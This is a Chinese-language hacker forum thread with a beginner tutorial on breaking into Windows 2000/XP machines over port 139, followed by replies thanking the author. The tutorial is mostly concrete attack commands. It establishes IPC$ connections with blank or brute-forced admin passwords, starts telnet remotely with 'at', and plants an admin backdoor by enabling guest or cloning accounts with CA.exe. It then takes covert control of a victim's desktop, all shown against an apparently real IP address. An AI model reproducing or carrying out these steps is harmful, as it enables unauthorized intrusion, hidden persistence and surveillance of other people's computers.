论坛: 菜鸟乐园 标题: 新手教程 复制本贴地址    
作者: night2000 [night2000]    论坛用户   登录
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
  <第一部份:知识介绍>
(1)什么是端口  
   端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
  (2)端口是唯一的吗?  
   端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。
  (3)TCP139端口的作用
   TCP139是用于网络共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
  (4)必要命令的详解和相关工具的使用
   首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
   点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
   dir的作用是列出指定路径下的目录和文件,输入c:\>dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
   cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\>d: 就到了D盘下了,而不用cd d:,这点要注意。
   del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
   copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。
   net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
    net use
net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?
    net view
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。
    net share
net share 用于开放共享,输入net share QQ=c:\tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。
    net user
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。  
   ┎───────────────────────────────────────────────────────┒ 
   ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。                      ┃  
   ┃ net user hacker /del 删除名为hacker的用户。                                 ┃ 
   ┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。                 ┃
   ┃ net user hacker /active:yes 激活已禁用的hacker这个用户。                           ┃ 
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
┖───────────────────────────────────────────────────────┚
net start / net stop
net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。
    *at 命令,net time
之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.

  (5)需要准备的工具
   肉鸡猎手v1.0  扫描一个网段,找出弱密码的计算机
   SMBCrack   针对特定主机,暴力猜解密码
   DameWare Mini Remote Control    监控运程屏幕   
   CA.exe 克隆管理员账号

  <第二部份:入侵实例>
今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面:)。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦:)。
  文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
  (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。
  (2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。
  (3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。
  好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。


地主 发表时间: 04-03-08 17:12

回复: foreverfly [foreverfly]   论坛用户   登录
  前辈果然厉害,让小弟叹服不止,收获不少
  谢了啊

B1层 发表时间: 04-03-09 07:47

回复: wavefly [wavefly]   论坛用户   登录
有收获,谢谢!

B2层 发表时间: 04-03-09 08:37

回复: newmyth21 [newmyth21]   论坛用户   登录
继续努力吧

B3层 发表时间: 04-03-09 08:37

回复: 6011883 [sdzcsw]   论坛用户   登录
收获大大的有的干活~~~~~~~~~~~谢谢前辈高手哈~~~~~~~~~~~~~~

B4层 发表时间: 04-05-09 11:03

回复: 6011883 [sdzcsw]   论坛用户   登录
好好~~~~~~~




[此贴被 6011883(sdzcsw) 在 05月09日12时44分 编辑过]

B5层 发表时间: 04-05-09 12:43

回复: xyzyx [xyzyx]   论坛用户   登录
谢谢

B6层 发表时间: 04-05-10 12:15

回复: xj1985xj [xj1985xj]   论坛用户   登录
前辈说的那些工具哪能下在到

B7层 发表时间: 04-05-11 19:22

回复: aa [angle11]   论坛用户   登录
兄弟能做个朋友吗?我的QQ:306939137

B8层 发表时间: 04-05-19 17:47

回复: lijingxi [lijingxi]   见习版主   登录
呵呵!还行!

B9层 发表时间: 04-05-19 19:14

回复: bluecat_ [bluecat_]   论坛用户   登录
那里下载呀?~~~~~~~~~~~

B10层 发表时间: 04-05-19 20:38

回复: semimail [semimail]   论坛用户   登录
收起来慢慢看,嘿嘿!

B11层 发表时间: 04-05-21 02:05

回复: lgf [lgf]   论坛用户   登录
还好呀~1

B12层 发表时间: 04-05-21 12:21

回复: wolfhui [wolfhui]   论坛用户   登录
不行,用at \\ip time telnet  后根本telnet不进去,是不是有问题啊

B13层 发表时间: 04-05-21 14:45

回复: sjhaike [sjhaike]   论坛用户   登录
以后多给我们点此类一手资料
  代兄弟们谢过了

B14层 发表时间: 04-05-22 09:21

回复: liangtxm [liangtxm]   论坛用户   登录
初学者菜鸟看看哦

B15层 发表时间: 10-11-17 16:13

回复: maopiyuan [maopiyuan]   论坛用户   登录
顶你。。。很有用

B16层 发表时间: 10-11-19 09:00

回复: badguy [badguy]   论坛用户   登录
终于有点入门的感觉,希望以后多点这类详细材料。

B17层 发表时间: 10-11-28 11:50

回复: dakeng6666 [dakeng6666]   论坛用户   登录
真的不错,不过很想知道那些工具怎么弄呀

B18层 发表时间: 10-12-14 13:18

回复: l3657813 [l3657813]   论坛用户   登录
前辈,WIN7的怎么操作?

B19层 发表时间: 10-12-15 10:17

回复: mengyu [mengyu]   论坛用户   登录
好好学习,天天进步!

B20层 发表时间: 11-03-19 14:22

回复: wayshmily [wayshmily]   论坛用户   登录
学习学习!1

B21层 发表时间: 11-05-10 00:31

回复: jing1993 [jing1993]   论坛用户   登录
前辈 教教简单的对我们这些菜鸟是非常有帮助的    谢谢你了

B22层 发表时间: 11-05-13 15:51

回复: ooohl [ooohl]   论坛用户   登录
谢了  努力

B23层 发表时间: 11-11-06 21:37

回复: banyang [banyang]   论坛用户   登录
��

B24层 发表时间: 12-01-29 04:18

回复: gnow [wong1991]   论坛用户   登录
嗯 学习学习

B25层 发表时间: 12-04-02 02:30

回复: God_only [god_only]   论坛用户   登录


B26层 发表时间: 12-04-28 09:11

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号